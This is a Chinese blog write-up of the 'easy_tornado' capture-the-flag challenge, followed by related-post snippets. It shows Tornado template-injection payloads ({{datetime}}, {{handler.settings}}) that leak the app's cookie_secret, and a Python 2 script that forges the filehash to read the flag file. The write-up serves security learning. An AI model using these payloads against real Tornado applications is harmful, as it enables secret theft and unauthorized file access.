web17.easy-tornado

最新推荐文章于 2024-07-07 13:11:12 发布
最新推荐文章于 2024-07-07 13:11:12 发布
阅读量72 收藏
点赞数
文章标签: tornado
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yu_jing_hong/article/details/120009380
版权

 存在render函数渲染

需要知道cookie_secret

 首先访问/fllllllllllllag

显示error?msg=Error,猜测服务端模板存在注入攻击(SSTI)

尝试验证/error?msg={{datetime}}

再构造payload获取cookie_secret:

/error?msg={{handler.settings}}

'cookie_secret': 'b94dd73c-a043-429c-9725-33525b0c2c3f' 

计算filehash值,python2脚本如下

 

# -*- coding: UTF-8 -*-
import hashlib

def md5(s):
 md5 = hashlib.md5()
 md5.update(s)
 return md5.hexdigest()
 
def filehash():
 filename = '/fllllllllllllag'
 cookie_secret = 'b94dd73c-a043-429c-9725-33525b0c2c3f'
 print(md5(cookie_secret+md5(filename)))
 
if __name__ == '__main__':
 filehash()

 

 payload:file?filename=/fllllllllllllag&filehash=98b9cc951e0ba6127178cabbbe904517

flag{fa3723e4-77f8-42a5-b358-efdb7bfd2230} 

yu_jing_hong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
Flask-Easy-Template:包含Flask的模板网络应用。 功能:最新的引导程序,用户注册表,登录名,忘记密码。 安全的管理面板,分页,Nginx和Supervisor的配置文件等等
02-05
用户注册表,登录名和忘记密码与SendGrid进行电子邮件集成,并与Recaptcha进行联系一个带有分页SQLALchemy的示例任务数据库如何使用它: git clone https://github.com/AndreiD/Flask-Easy-Template.git <
buuctf easy-tornado
ANYOUZHEN的博客
05-26 481
打开后,flag.txt直接说明了,最终的flag在/fllllllllllllag文件下 hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag 发现他们的url都是由filename和filehash组成。filehash是他们filename的md5值。 当filename或filehash不匹配时,将会跳转到http://web9.buuoj.cn/error?msg=Error ..
buuctf easy-tornado(cookie_secret)
qq_54929891的博客
02-27 1648
进入url可以看到三个超链接 都分别点开看看 并且发现url中传输了两个参数,一个是filename,另一个是filehash,在flag.txt中将filename改为提示的/fllllllllllllag试一试 看来拿到flag的关键就在于解出filehash是什么,根据连接的提示,我们可以猜想filehash=md5(cookie_secret+md5(filename)),filename我们知道就是/fllllllllllllag,但是cookie _secret我们就不.
BUUCTF---easy-tornado
weixin_44255856的博客
07-29 1655
打开链接发现存在3个txt文件 依次访问 flag.txt直接说明了,最终的flag在/fllllllllllllag文件下 hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag. 但是cookie_secret不知道 提示render. 谷歌发现render是python的一...
[护网杯 2018]easy_tornado
Yb_140的博客
09-05 1596
即md5('61375ac6-5e1d-4510-a256-12786c3e1f09'+md5('/fllllllllllllag'))得到提示信息,得到cookie_secret:61375ac6-5e1d-4510-a256-12786c3e1f09。猜测这里的filehash就是md5加密得到的,我们需要找到cookie_secret。然后结合md5(cookie_secret+md5(filename)),简单来说就是用来生成模板的东西。,就是一个公式,能输出前端页面的公式。
Buuctf-web:easy_tornado
羽的博客
07-01 136
就一个一个打开看看就好了 再看看这个URL,你很难没点什么想法! 做题就是要大胆的尝试。 把filename写成:/fllllllllllllag这个的时候。发现一些返回 好像msg的值会被回显。 又根据前面render函数,还有题目所给的tornad,想到ssti. 在Tornado的前端页面模板中,datetime是指向python中datetime这个模块,Tornado提供了一些对象别名来快速访问对象, 成功回显。 看到一些类。 ...
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 371
攻防世界easytornado-tornado模板注入
BUUCTF[护网杯 2018]easy_tornado1-write up
m0_62851980的博客
04-23 892
知识点: SSTI(模板注入),render函数,Tornado框架(知识点在最后) 打开靶机,看到三个链接: 分别点进去: 注意每个链接的url: /file?filename=/xxx&filehash=32位MD5 根据flag.txt和hint.txt提示url的形式为:文件名+32位MD5 再看hint.txt的提示:md5(cookie_secret+md5(filename))。明显我们要先找到cookie_secret进行MD5加密,再和进行MD5加密后输入的文
web buuctf [护网杯 2018]easy_tornado1
weixin_44214568的博客
03-12 4435
分解信息量: 1.题目名称是easy-tornadotornado是python的web框架(web框架的产生是避免程序代码与html编码的编码混乱性,框架将传参过程进行独立) 2.打开一共三个链接,分别点开 /flag.txt 提示内容:flag in /fllllllllllllag ,意思就是flag在文件fllllllllllllag里面,需要考虑怎么进入文件里面 /welcome.txt 提示内容:render,render是tornado里面的渲染函数,就是对web网页界面进行编辑的函
【BUUCTF-Webeasy_tornado
RexHa的博客
09-04 546
【BUUCTF-Webeasy_tornado
Python库 | artellapipe-0.0.19-py3.6.egg
02-21
在后端开发中,Python常用于构建Web服务器、API接口、数据库连接、任务调度等。它的各种库如Django、Flask、Tornado等,为后端开发提供了丰富的工具和框架支持。 **Python库的作用** Python库是Python生态系统中的...
tornado-webservices:龙卷风Web服务器的SOAP Web服务的实现
05-26
先决条件: 您需要安装龙卷风,必须从以下位置下载并安装:安装: 使用画中画: $ pip install tornado-webservices使用easy_install: $ easy_install tornado-webservices手动: $ tar xvzf tornado-webservices-...
Python库 | pythondata_cpu_mor1kx-5.0.post165-py3.8.egg
02-21
在后端开发中,Python常用于构建Web服务器、API接口以及数据处理服务。Python库如Django、Flask和Tornado等,极大地简化了开发过程。 **Python库生态** Python拥有庞大的第三方库生态系统,覆盖了数据分析、机器...
Tornado:高性能异步Web框架详解
Aaron_945的博客
07-07 1083
Web开发的广阔领域中,处理高并发和实时性需求一直是开发者们面临的挑战。Tornado,作为一个由FriendFeed(后被Facebook收购)开发的Python Web框架,以其非阻塞的I/O操作和异步网络库而著称,成为构建高性能、实时Web服务的理想选择。Tornado是一个高性能的异步Web框架,适用于需要处理大量并发请求和实时交互的应用场景。通过非阻塞I/O和异步编程模式,Tornado能够提供出色的性能和可扩展性。因此,Tornado的代码库相对较小,易于学习和使用。然后,我们创建了一个。
项目部年度员工培训计划.docx
07-13
项目部年度员工培训计划.docx
c的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txt
最新发布
07-13
cc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.tx
营销策划 -猫人内衣品牌升级诊断方案.pptx
07-13
营销策划 -猫人内衣品牌升级诊断方案.pptx
distributed 2022.7.0 requires tornado<6.2,>=6.0.3, but you have tornado 6.3.2 which is incompatible. conda-repo-cli 1.0.20 requires clyent==1.2.1, but you have clyent 1.2.2 which is incompatible. conda-repo-cli 1.0.20 requires nbformat==5.4.0, but you have nbformat 5.5.0 which is incompatible. conda-repo-cli 1.0.20 requires requests==2.28.1, but you have requests 2.31.0 which is incompatible.
06-10
pip install distributed==2022.7.0 tornado==6.0.3 clyent==1.2.1 nbformat==5.4.0 requests==2.28.1 ``` 另外,如果您使用的是 conda 环境,您也可以使用以下命令更新这些包版本: ``` conda install ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值